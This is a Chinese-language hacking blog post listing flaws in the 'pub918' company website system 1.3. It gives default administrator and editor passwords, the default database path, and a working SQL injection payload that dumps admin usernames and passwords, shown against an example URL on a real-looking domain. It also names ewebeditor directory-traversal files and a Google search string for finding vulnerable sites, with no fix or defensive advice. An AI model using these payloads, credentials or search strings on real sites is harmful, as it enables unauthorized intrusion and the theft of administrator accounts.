当前位置: iick's blog > 网站漏洞 > pub918软件公司网站系统1.3 存在多处漏洞

pub918软件公司网站系统1.3 存在多处漏洞

作者:hack1990 时间:11-04-16 阅读数:664人阅读

pub918软件公司网站系统是一个很漂亮的企业型网站
后台用户名密码admin
下载地址:http://www.mycodes.net/25/4040.htm

后台:admin/
默认数据库:admin/db/N%23%23ews.mdb

1、ewebeditor 问题。
路径:
admin/webedit/admin_login.asp
帐号密码:
admin
29767143
利用:略。你懂的。


2、注入漏洞:
漏洞文件:new.asp
查询语句:union select 1,2,3,adminUID,5,6,7,adminPWD,9,10 from admin
利用:随便打开一个新闻在后面加上查询语句即可爆出管理帐号密码。如:
http://www.hackqing.com/new.asp?id=62 union select 1,2,3,adminUID,5,6,7,adminPWD,9,10 from admin

3、遍历目录:
ewebeditor 遍历漏洞。
漏洞文件:
Admin_UploadFile1.asp
Admin_UploadFile.asp
利用:略。你懂的。

google
inurl:download.asp

 

From:www.0855.tv
By:Mr.DzY
 


 

# OneinStack 1.2 发布# MySQL数据库猜密码脚本PHP版# Linux 用iptables转发内网的服务# Nmap Security Scanner 7.0

上一篇:查找管理员后台的小技巧

下一篇:Ewebeditor 5.5 列目录漏洞利用方法

相关文章

发表评论